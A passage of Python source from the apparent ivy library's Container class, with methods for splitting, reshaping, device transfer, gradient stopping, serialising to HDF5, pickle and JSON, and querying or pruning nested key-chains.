:param dev_strs: The devices along which to distribute the container.
:type dev_strs: sequence of strs or dict of split sizes
:param axis: The axis along which to split the arrays at the container leaves. Default is 0.
:type axis: int, optional
:return: a set of distributed sub-containers across the specified devices.
"""
split_arg = list(dev_strs.values()) if isinstance(dev_strs, dict) else len(dev_strs)
return self._ivy.DevDistItem(
{dev_str: cont.to_dev(dev_str) for cont, dev_str in
zip(self.split(split_arg, axis, with_remainder=True), dev_strs)})
def to_multi_dev(self, dev_strs, axis=0):
"""
Return a single MultiDevContainer, which shares the same structure as the current container, but replaces arrays
at the leaves with DistributedArray instances.
:param dev_strs: The devices along which to distribute each array in the container.
:type dev_strs: sequence of str
:param axis: The axis along which to split the arrays at the container leaves. Default is 0.
:type axis: int, optional
:return: a MultiDevContainer instance, with all leaf arrays replaced by DistributedArray instances.
"""
return MultiDevContainer(
self.map(lambda x, kc: self._ivy.dev_dist_array(x, dev_strs, axis)), dev_strs, **self._config)
def unstack(self, axis, keepdims=False, dim_size=None):
"""
Unstack containers along specified dimension.
:param axis: Dimensions along which to unstack.
:type axis: int
:param keepdims: Whether to keep dimension 1 in the unstack dimensions. Default is False.
:type keepdims: bool, optional
:param dim_size: Size of the dimension to unstack. Determined from inputs by default.
:type dim_size: int, optional
:return: List of containers, unstacked along the specified dimension.
"""
if dim_size is None:
dim_size = self.shape[axis]
if keepdims:
# noinspection PyTypeChecker
return [self[slice(i, i+1, 1) if axis == 0
else tuple([slice(None, None, None)] * axis + [slice(i, i+1, 1)])] for i in range(dim_size)]
# noinspection PyTypeChecker
return [self[i if axis == 0 else tuple([slice(None, None, None)] * axis + [i])] for i in range(dim_size)]
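# Minimal usage sketch for unstack (hypothetical container):
#
#   cont = Container({'x': ivy.array([[1., 2.], [3., 4.]])})   # leaf shape (2, 2)
#   cont.unstack(0)                 # list of 2 containers, leaf shape (2,) each
#   cont.unstack(0, keepdims=True)  # list of 2 containers, leaf shape (1, 2) each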
def split(self, num_or_size_splits=None, axis=0, with_remainder=False, key_chains=None, to_apply=True,
prune_unapplied=False):
"""
Splits a container into multiple sub-containers, by splitting their constituent arrays.
:param num_or_size_splits: Number of equal arrays to divide the array into along the given axis if an integer.
The size of each split element if a sequence of integers.
Default is to divide into as many 1-dimensional arrays as the axis dimension.
:type num_or_size_splits: int or sequence of ints, optional
:param axis: The axis along which to split, default is 0.
:type axis: int, optional
:param with_remainder: If the tensor does not split evenly, then store the last remainder entry.
Default is False.
:type with_remainder: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: A list of sub-arrays.
"""
# ToDo: make this more efficient, without so many recursive container calls. For example the splits indices
# can be calculated here, and then slices applied directly only once
dim_size = num_or_size_splits if isinstance(num_or_size_splits, int) else (
    self.shape[axis] if num_or_size_splits is None else len(num_or_size_splits))
# noinspection PyTypeChecker
return self.map(
lambda x, kc: self._ivy.split(x, num_or_size_splits, axis, with_remainder) if self._ivy.is_array(x)
else x, key_chains, to_apply, prune_unapplied).unstack(0, dim_size=dim_size)
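# Minimal usage sketch for split (hypothetical container):
#
#   cont = Container({'x': ivy.array([[1., 2.], [3., 4.], [5., 6.], [7., 8.]])})   # leaf shape (4, 2)
#   halves = cont.split(2)       # list of 2 containers, leaf shape (2, 2) each
#   parts = cont.split([1, 3])   # list of 2 containers, leaf shapes (1, 2) and (3, 2)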
def gather(self, indices, axis=-1, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Gather slices from all container params at axis according to indices.
:param indices: Index array.
:type indices: array
:param axis: The axis from which to gather from. Default is -1.
:type axis: int, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays gathered along the axis according to the indices.
"""
return self.map(lambda x, kc: self._ivy.gather(x, indices, axis) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def gather_nd(self, indices, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Gather slices from all container params into arrays with shapes specified by indices.
:param indices: Index array.
:type indices: array
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with gather_nd applied to all sub-arrays.
"""
return self.map(lambda x, kc: self._ivy.gather_nd(x, indices) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
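# Minimal usage sketch for gather / gather_nd (hypothetical container, numpy-like backend assumed):
#
#   cont = Container({'x': ivy.array([10., 20., 30., 40.])})
#   cont.gather(ivy.array([0, 2]))     # leaf 'x' -> [10., 30.]
#   cont.gather_nd(ivy.array([[3]]))   # leaf 'x' -> [40.]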
def repeat(self, repeats, axis=None, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Repeat values along a given dimension for each array in the container.
:param repeats: Number of repetitions for each element. repeats is broadcast to fit the shape of the given axis.
:type repeats: int or sequence of ints.
:param axis: The axis along which to repeat values.
By default, use the flattened input array, and return a flat output array.
:type axis: int, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each array being repeated along the specified dimension.
"""
return self.map(lambda x, kc: self._ivy.repeat(x, repeats, axis) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def swapaxes(self, axis0, axis1, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Interchange two axes for each array in the container.
:param axis0: First axis to be swapped.
:type axis0: int
:param axis1: Second axis to be swapped.
:type axis1: int
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: ivy.Container with each chosen array having the axes swapped.
"""
return self.map(lambda x, kc: self._ivy.swapaxes(x, axis0, axis1) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reshape(self, pre_shape=None, shape_slice=None, post_shape=None, key_chains=None, to_apply=True,
prune_unapplied=False):
"""
Reshapes each array x in the container, to a new shape given by pre_shape + x.shape[shape_slice] + post_shape.
If shape_slice or post_shape are not specified, then the term is ignored.
:param pre_shape: The first elements in the new array shape.
:type pre_shape: int or sequence of ints, optional
:param shape_slice: The slice of the original shape to use in the new shape. Default is None.
:type shape_slice: int or sequence of ints, optional
:param post_shape: The final elements in the new array shape. Default is None.
:type post_shape: sequence of ints, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: ivy.Container with each array reshaped as specified.
"""
pre_shape = [] if pre_shape is None else\
([pre_shape] if isinstance(pre_shape, int) else list(pre_shape))
post_shape = [] if post_shape is None else\
([post_shape] if isinstance(post_shape, int) else list(post_shape))
if shape_slice is None:
return self.map(lambda x, kc: self._ivy.reshape(x, pre_shape + post_shape) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
shape_slice = slice(shape_slice, shape_slice+1) if isinstance(shape_slice, int) else shape_slice
return self.map(lambda x, kc:
self._ivy.reshape(x, pre_shape + list(x.shape[shape_slice]) + post_shape)
if self._ivy.is_array(x) else x, key_chains, to_apply, prune_unapplied)
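# Minimal usage sketch for reshape (hypothetical container):
#
#   cont = Container({'x': ivy.array([[1., 2., 3.], [4., 5., 6.]])})   # leaf shape (2, 3)
#   cont.reshape(6)                                      # leaf shape becomes (6,)
#   cont.reshape(pre_shape=1, shape_slice=slice(0, 2))   # leaf shape becomes (1, 2, 3)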
def einops_rearrange(self, pattern, key_chains=None, to_apply=True, prune_unapplied=False, **axes_lengths):
"""
Perform einops rearrange operation on each sub array in the container.
:param pattern: Rearrangement pattern.
:type pattern: str
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: ivy.Container with each array having einops.rearrange applied.
"""
return self.map(lambda x, kc: _ivy.einops_rearrange(x, pattern, **axes_lengths) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def einops_reduce(self, pattern, reduction, key_chains=None, to_apply=True, prune_unapplied=False, **axes_lengths):
"""
Perform einops reduce operation on each sub array in the container.
:param pattern: Reduction pattern.
:type pattern: str
:param reduction: One of available reductions ('min', 'max', 'sum', 'mean', 'prod'), or callable.
:type reduction: str or callable
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: ivy.Container with each array having einops.reduce applied.
"""
return self.map(lambda x, kc: _ivy.einops_reduce(x, pattern, reduction, **axes_lengths) if self._ivy.is_array(x)
else x, key_chains, to_apply, prune_unapplied)
def einops_repeat(self, pattern, key_chains=None, to_apply=True, prune_unapplied=False, **axes_lengths):
"""
Perform einops repeat operation on each sub array in the container.
:param pattern: Rearrangement pattern.
:type pattern: str
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: ivy.Container with each array having einops.repeat applied.
"""
return self.map(lambda x, kc: _ivy.einops_repeat(x, pattern, **axes_lengths) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
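# Minimal usage sketch for the einops wrappers (requires the einops package; hypothetical container):
#
#   cont = Container({'x': ivy.array([[1., 2.], [3., 4.]])})   # leaf shape (2, 2)
#   cont.einops_rearrange('h w -> w h')       # per-leaf transpose
#   cont.einops_reduce('h w -> h', 'mean')    # per-leaf mean over the w axis
#   cont.einops_repeat('h w -> h w c', c=3)   # per-leaf repeat, leaf shape becomes (2, 2, 3)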
def to_dev(self, dev_str, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Move the container arrays to the desired device, specified by device string.
:param dev_str: Device to move the arrays to, e.g. 'cuda:0', 'cuda:1' or 'cpu'. Keeps the current device if None.
:type dev_str: str, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: The container, but with each sub-array now placed on the target device.
"""
return self.map(lambda x, kc: self._ivy.stop_gradient(self._ivy.to_dev(x, dev_str))
if self._ivy.is_array(x) else x, key_chains, to_apply, prune_unapplied)
def stop_gradients(self, preserve_type=True, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Stop gradients of all array entries in the container.
:param preserve_type: Whether to preserve the input type (ivy.Variable or ivy.Array),
otherwise an array is always returned. Default is True.
:type preserve_type: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each array having their gradients stopped.
"""
return self.map(
lambda x, kc: self._ivy.stop_gradient(x, preserve_type) if self._ivy.is_variable(x)
else x, key_chains, to_apply, prune_unapplied)
def as_variables(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Converts all nested arrays to variables, which support gradient computation.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each array converted to a variable.
"""
return self.map(lambda x, kc: self._ivy.variable(x) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def as_arrays(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Converts all nested variables to arrays, which do not support gradient computation.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each variable converted to an array.
"""
return self.map(
lambda x, kc: self._ivy.stop_gradient(x, False) if self._ivy.is_variable(x)
else (x if self._ivy.is_array(x) else self._ivy.array(x)), key_chains, to_apply, prune_unapplied)
def to_numpy(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Converts all nested ivy arrays to numpy arrays.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each ivy array converted to a numpy array.
"""
return self.map(
lambda x, kc: self._ivy.to_numpy(x) if self._ivy.is_array(x) else x, key_chains, to_apply, prune_unapplied)
def arrays_as_lists(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Converts all nested arrays to lists, a useful intermediate step for conversion to other framework array types.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: container with each array converted to a list.
"""
return self.map(
lambda x, kc: self._ivy.to_list(x) if self._ivy.is_array(x) else x, key_chains, to_apply, prune_unapplied)
def to_disk_as_hdf5(self, h5_obj_or_filepath, starting_index=0, mode='a', max_batch_size=None):
"""
Save container object to disk, as an h5py file, at the specified filepath.
:param h5_obj_or_filepath: Filepath for where to save the container to disk, or h5 object.
:type h5_obj_or_filepath: str or h5 object
:param starting_index: Batch index for which to start writing to file, if it already exists
:type starting_index: int
:param mode: H5 read/write mode for writing to disk, ['r', 'r+', 'w', 'w-', 'a'], default is 'a'.
:type mode: str
:param max_batch_size: Maximum batch size for the container on disk, this is useful if later appending to file.
:type max_batch_size: int
"""
if type(h5_obj_or_filepath) is str:
h5_obj = _h5py.File(h5_obj_or_filepath, mode)
else:
h5_obj = h5_obj_or_filepath
for key, value in sorted(self.items()):
if isinstance(value, Container):
if key not in h5_obj.keys():
h5_group = h5_obj.create_group(key)
else:
h5_group = h5_obj[key]
value.to_disk_as_hdf5(h5_group, starting_index, mode, max_batch_size)
else:
value_as_np = self._ivy.to_numpy(value)
value_shape = value_as_np.shape
this_batch_size = value_shape[0]
if not max_batch_size:
max_batch_size = starting_index + this_batch_size
if key not in h5_obj.keys():
dataset_shape = [max_batch_size] + list(value_shape[1:])
maxshape = ([None for _ in dataset_shape])
h5_obj.create_dataset(key, dataset_shape, dtype=value_as_np.dtype, maxshape=maxshape)
space_left = max_batch_size - starting_index
amount_to_write = min(this_batch_size, space_left)
h5_obj[key][starting_index:starting_index + amount_to_write] = value_as_np[0:amount_to_write]
def to_disk_as_pickled(self, pickle_filepath):
"""
Save container object to disk, as a pickled file, at the specified filepath.
:param pickle_filepath: Filepath for where to save the container to disk.
:type pickle_filepath: str
"""
cont_to_dump = self.to_native().to_dict() if _ivy.wrapped_mode() else self.to_dict()
with open(pickle_filepath, 'wb') as pickle_file:
    _pickle.dump(cont_to_dump, pickle_file)
def to_jsonable(self, return_dict=None):
"""
Return container with non-jsonable elements converted to string representations, which are jsonable.
"""
if return_dict is None:
return_dict = self.copy()
for k, v in return_dict.items():
if not _is_jsonable(v):
if isinstance(v, dict):
return_dict[k] = self.to_jsonable(v)
else:
return_dict[k] = str(v)
return return_dict
def to_disk_as_json(self, json_filepath):
"""
Save container object to disk, as a JSON file, at the specified filepath.
:param json_filepath: Filepath for where to save the container to disk.
:type json_filepath: str
"""
with open(json_filepath, 'w+') as json_data_file:
_json.dump(self.to_jsonable().to_dict(), json_data_file, indent=4)
def to_list(self):
"""
Return nested list representation of container object.
:return: Container as nested list.
"""
return_list = list()
for key, value in sorted(self.items()):
if isinstance(value, Container):
return_list.append(value.to_list())
elif value is not None and key != '_f':
return_list.append(value)
return return_list
def to_raw(self):
"""
Return nested raw representation of container object. This includes restoring lists and tuples passed in the
constructor to their original form.
:return: Container data in its raw form.
"""
return_item = dict()
for i, (key, value) in enumerate(sorted(self.items())):
if isinstance(value, Container):
return_item[key] = value.to_raw()
elif key[0:3] == 'it_' and tuple(self._types_to_iteratively_nest):
return_item = list([v.to_raw() if isinstance(v, Container) else v for v in self.values()])
break
else:
return_item[key] = value
return return_item
def to_dict(self):
"""
Return nested pure dict representation of container object.
:return: Container as nested dict.
"""
return_dict = dict()
for key, value in sorted(self.items()):
if isinstance(value, Container):
return_dict[key] = value.to_dict()
else:
return_dict[key] = value
return return_dict
def to_iterator(self, key_chain='', leaf_keys_only=False):
"""
Return iterator for traversing through the nested elements of container object.
:return: Iterator for the container elements.
"""
for key, value in sorted(self.items()):
if leaf_keys_only:
kc = key
else:
kc = key_chain + '/' + key if key_chain != '' else key
if isinstance(value, Container):
# noinspection PyCompatibility
yield from value.to_iterator(kc, leaf_keys_only)
else:
yield kc, value
def to_iterator_values(self):
"""
Return iterator for traversing through the nested values of container object.
:return: Iterator for the container values.
"""
for key, value in sorted(self.items()):
if isinstance(value, Container):
# noinspection PyCompatibility
yield from value.to_iterator_values()
else:
yield value
def to_iterator_keys(self, key_chain='', leaf_keys_only=False):
"""
Return iterator for traversing through the nested keys of container object.
:return: Iterator for the container elements.
"""
for key, value in sorted(self.items()):
if leaf_keys_only:
kc = key
else:
kc = key_chain + '/' + key if key_chain != '' else key
if isinstance(value, Container):
# noinspection PyCompatibility
yield from value.to_iterator_keys(kc, leaf_keys_only)
else:
yield kc
def to_flat_list(self):
"""
Return flat list representation of container object.
:return: Container as flat list.
"""
return list([item for key, item in self.to_iterator()])
def from_flat_list(self, flat_list):
"""
Return new container object with the same hierarchy, but with values replaced from flat list.
:param flat_list: flat list of values to populate container with.
:type flat_list: sequence of arrays
:return: Container.
"""
new_dict = dict()
for key, value in sorted(self.items()):
if isinstance(value, Container):
new_value = value.from_flat_list(flat_list)
else:
new_value = flat_list.pop(0)
new_dict[key] = new_value
return Container(new_dict, **self._config)
def has_key(self, query_key):
"""
Determine whether the container object has the specified key somewhere in the nested structure.
:return: Boolean
"""
has_key = False
def map_fn(x, kc):
nonlocal has_key
if query_key in kc:
has_key = True
return x
self.map(map_fn)
return has_key
def has_key_chain(self, key_chain):
"""
Determine whether the container object has the specified key-chain.
:return: Boolean
"""
keys = re.split('[/.]', key_chain)
ret = self
for key in keys:
try:
ret = ret[key]
except KeyError:
return False
return True
def has_nans(self, include_infs=True, leafwise=False):
"""
Determine whether arrays in the container contain any nans, as well as infs or -infs if specified.
:param include_infs: Whether to include infs and -infs in the check. Default is True.
:type include_infs: bool, optional
:param leafwise: Whether to apply the check leaf-wise, and return a container of booleans. Default is False,
in which case the check is applied across the entire container, returning a single boolean.
:type leafwise: bool, optional
:return: Whether the container has any nans, applied either leafwise or across the entire container.
"""
leafwise_res = self.map(lambda x, kc: _ivy.has_nans(x, include_infs))
if leafwise:
return leafwise_res
return max([v for k, v in leafwise_res.to_iterator()])
def at_keys(self, queries, ignore_none=True, containing=False, ignore_key_errors=False):
"""
Query container object at specified keys, either as list or nested dict.
:param queries: The keys to query.
:type queries: sequence of strs or single str
:param ignore_none: Whether to ignore None input. Default is True.
:type ignore_none: bool, optional
:param containing: Whether to include keys which only contain the query substrings. Default is False.
:type containing: bool, optional
:param ignore_key_errors: Whether to ignore Key-errors when trying to access the dict. Default is False.
:type ignore_key_errors: bool, optional
:return: sub-container containing only key-chains containing the specified keys.
"""
if queries is None and ignore_none:
return self
key_chains_to_keep = list()
if isinstance(queries, str):
queries = [queries]
def map_fn(x, kc):
nonlocal key_chains_to_keep
kc_split = re.split('[/.]', kc)
for query_key in queries:
if query_key in kc_split or (containing and min([query_key in k for k in kc_split])):
key_chains_to_keep.append(kc)
return x
self.map(map_fn)
return self.at_key_chains(key_chains_to_keep, ignore_key_errors=ignore_key_errors)
def at_key_chain(self, key_chain, ignore_key_errors=False):
"""
Query container object at a specified key-chain
:return: sub-container or value at specified key chain
"""
keys = re.split('[/.]', key_chain)
ret = self
for key in keys:
try:
ret = ret[key]
except KeyError as e:
if ignore_key_errors:
return
raise e
return ret
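# Illustrative usage of the key-chain query above (kept as comments so this file's behaviour is unchanged;
# the container values are hypothetical):
#   cont = Container({'a': {'b': 1}})
#   cont.at_key_chain('a/b')                          -> 1
#   cont.at_key_chain('a.b')                          -> 1  ('/' and '.' both act as separators, see re.split above)
#   cont.at_key_chain('a/x', ignore_key_errors=True)  -> None (missing chain, error ignored)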
def at_key_chains(self, key_chains, ignore_none=True, ignore_key_errors=False):
"""
Query container object at specified key-chains, either as list or nested dict.
:return: sub-container containing only the specified key chains
"""
if key_chains is None and ignore_none:
return self
if isinstance(key_chains, (list, tuple)):
return self._at_key_chains_input_as_seq(key_chains, ignore_key_errors=ignore_key_errors)
elif isinstance(key_chains, dict):
return self._at_key_chains_input_as_dict(key_chains, ignore_key_errors=ignore_key_errors)
elif isinstance(key_chains, str):
return self._at_key_chains_input_as_seq([key_chains], ignore_key_errors=ignore_key_errors)
else:
raise Exception('Invalid type for input key_chains, must either be a list, tuple, dict, or ivy.Container, '
'but found type {}'.format(type(key_chains)))
def set_at_keys(self, target_dict):
"""
Set values of container object at specified keys
:return: new container with updated value at each key
"""
return_dict = dict()
for key, val in self.items():
if key in target_dict:
return_dict[key] = target_dict[key]
elif isinstance(val, Container):
return_dict[key] = val.set_at_keys(target_dict)
else:
return_dict[key] = val
return Container(return_dict, **self._config)
def set_at_key_chain(self, key_chain, val, inplace=False):
"""
Set value of container object at a specified key-chain
:return: new container with updated value at key chain
"""
keys = re.split('[/.]', key_chain)
if inplace:
cont = self
else:
cont = self.copy()
sub_cont = cont
for key in keys[:-1]:
if key not in sub_cont:
sub_cont[key] = Container(**self._config)
sub_cont = sub_cont[key]
sub_cont[keys[-1]] = val
return cont
def overwrite_at_key_chain(self, key_chain, val, inplace=False):
"""
Overwrite value of container object at a specified key-chain
:return: new container with updated value at key chain, provided it existed before.
"""
keys = re.split('[/.]', key_chain)
if inplace:
cont = self
else:
cont = self.copy()
sub_cont = cont
for key in keys[:-1]:
if key not in sub_cont:
raise Exception('key chain must already exist in container in order to call overwrite_at_key_chain')
sub_cont = sub_cont[key]
if keys[-1] not in sub_cont:
raise Exception('key chain must already exist in container in order to call overwrite_at_key_chain')
sub_cont[keys[-1]] = val
return cont
def set_at_key_chains(self, target_dict, return_dict=None, inplace=False):
"""
Set values of container object at specified key-chains
:return: new container with updated values at the key chains
"""
if return_dict is None:
if inplace:
return_dict = self
else:
return_dict = self.copy()
for k, v in target_dict.items():
if isinstance(v, dict):
return_dict[k] = self.set_at_key_chains(v, return_dict[k], inplace)
else:
return_dict[k] = v
return Container(return_dict, **self._config)
def overwrite_at_key_chains(self, target_dict, return_dict=None, inplace=False):
"""
Overwrite values of container object at specified key-chains
:return: new container with updated values at the key chains, provided they existed before.
"""
if return_dict is None:
if inplace:
return_dict = self
else:
return_dict = self.copy()
for k, v in target_dict.items():
if k not in return_dict:
raise Exception('key chain must already exist in container in order to call overwrite_at_key_chains')
if isinstance(v, dict):
return_dict[k] = self.overwrite_at_key_chains(v, return_dict[k], inplace)
else:
return_dict[k] = v
return Container(return_dict, **self._config)
def prune_keys(self, query_keys, ignore_none=True):
"""
Recursively prune set of keys
:return: Container with key-chains containing the specified keys pruned.
"""
if query_keys is None and ignore_none:
return self
key_chains_to_prune = list()
if isinstance(query_keys, str):
query_keys = [query_keys]
def map_fn(x, kc):
nonlocal key_chains_to_prune
for query_key in query_keys:
if query_key in kc:
key_chains_to_prune.append(kc)
return x
self.map(map_fn)
return self.prune_key_chains(key_chains_to_prune)
def prune_key_chain(self, key_chain):
"""
Recursively prune chain of keys, specified as 'key1/key2/key3/...'
:return: Container with keys in key chain pruned.
"""
keys_in_chain = re.split('[/.]', key_chain)
out_dict = dict()
for key, value in sorted(self.items()):
if isinstance(value, Container):
if key == keys_in_chain[0]:
if len(keys_in_chain) == 1:
new_val = []
else:
new_val = value.prune_key_chain('/'.join(keys_in_chain[1:]))
if len(new_val) > 0:
out_dict[key] = new_val
else:
new_val = value.to_dict()
if len(new_val) > 0:
out_dict[key] = value.to_dict()
else:
if len(keys_in_chain) != 1 or key != keys_in_chain[0]:
out_dict[key] = value
return Container(out_dict, **self._config)
def prune_key_chains(self, key_chains, ignore_none=True):
"""
Recursively prune set of key chains
:return: Container with keys in the set of key chains pruned.
"""
if key_chains is None and ignore_none:
return self
if isinstance(key_chains, (list, tuple)):
return self._prune_key_chains_input_as_seq(key_chains)
elif isinstance(key_chains, dict):
return self._prune_key_chains_input_as_dict(key_chains)
elif isinstance(key_chains, str):
return self._prune_key_chains_input_as_seq([key_chains])
else:
raise Exception('Invalid type for input key_chains, must either be a list, tuple, dict, or ivy.Container, '
'but found type {}'.format(type(key_chains)))
def sort_by_key(self):
new_dict = dict()
for k, v in sorted(self.items()):
if isinstance(v, Container):
v_back = v.sort_by_key()
else:
v_back = v
new_dict[k] = v_back
return Container(new_dict, **self._config)
def restructure_keys(self, key_chain_mapping):
"""
Restructure the keys of the container.
:param key_chain_mapping: Sequence of lists/tuples of key chain mapping to apply, with original and new key
chains being the left and right terms respectively.
:type key_chain_mapping: sequence of len-2 sequences
:return: New container with the key chains updated.
"""
ret_cont = self.copy()
for orig_kc, new_kc in key_chain_mapping:
if orig_kc == '':
orig_kc_val = ret_cont
ret_cont = Container(**self._config)
else:
orig_kc_val = ret_cont[orig_kc]
ret_cont = ret_cont.prune_key_chain(orig_kc)
ret_cont[new_kc] = orig_kc_val
return ret_cont
def prune_empty(self, keep_Nones=False, base=True):
"""
Recursively prunes empty keys from the container dict structure.
Returns None if the entire container is empty.
:return: Container with empty keys pruned.
"""
out_dict = dict()
for key, value in sorted(self.items()):
if isinstance(value, Container):
new_value = value.prune_empty(keep_Nones, False)
if new_value:
out_dict[key] = new_value
elif self._ivy.exists(value) or keep_Nones:
out_dict[key] = value
if len(out_dict):
return Container(out_dict, **self._config)
if base:
return Container(**self._config)
return
def prune_key_from_key_chains(self, absolute=None, containing=None):
"""
Recursively prune absolute key or key containing a certain substring from all key chains.
:param absolute: The absolute key to detect in the key chains.
:type absolute: str, optional
:param containing: A substring to check each key for, when deciding which keys to prune.
:type containing: str, optional
:return: Container with specified key or substring-containing-key from all key chains removed from the chain.
"""
if not absolute and not containing:
raise Exception('At least one of absolute or containing arguments must be specified.')
out_cont = Container(**self._config)
for key, value in sorted(self.items()):
if (absolute and key == absolute) or (containing and containing in key):
if isinstance(value, Container):
out_cont = Container.combine(out_cont, value)
else:
out_cont = value
elif isinstance(value, Container):
out_cont[key] = value.prune_key_from_key_chains(absolute, containing)
else:
out_cont[key] = value
return out_cont
def prune_keys_from_key_chains(self, absolute=None, containing=None):
"""
Recursively prune absolute keys or keys containing certain substrings from all key chains.
:param absolute: The absolute key to detect in the key chains.
:type absolute: sequence of strs, optional
:param containing: A substring to check each key for, when deciding which keys to prune.
:type containing: sequence of strs, optional
:return: Container with specified keys or substring-containing-keys from all key chains removed from the chain.
"""
if not absolute and not containing:
raise Exception('At least one of absolute or containing arguments must be specified.')
out_cont = Container(**self._config)
for key, value in sorted(self.items()):
if (absolute and key in absolute) or (containing and max([con in key for con in containing])):
if isinstance(value, Container):
out_cont = Container.combine(out_cont, value)
else:
out_cont = value
elif isinstance(value, Container):
out_cont[key] = value.prune_keys_from_key_chains(absolute, containing)
else:
out_cont[key] = value
return out_cont
def copy(self):
"""
Create a copy of this container.
:return: A copy of the container
"""
return Container(self.to_dict(), **self._config)
def deep_copy(self):
"""
Create a deep copy (copying all internal tensors) of this container.
:return: A deep copy of the container
"""
return self.map(lambda x, kc: _ivy.copy_array(x) if _ivy.is_array(x) else x)
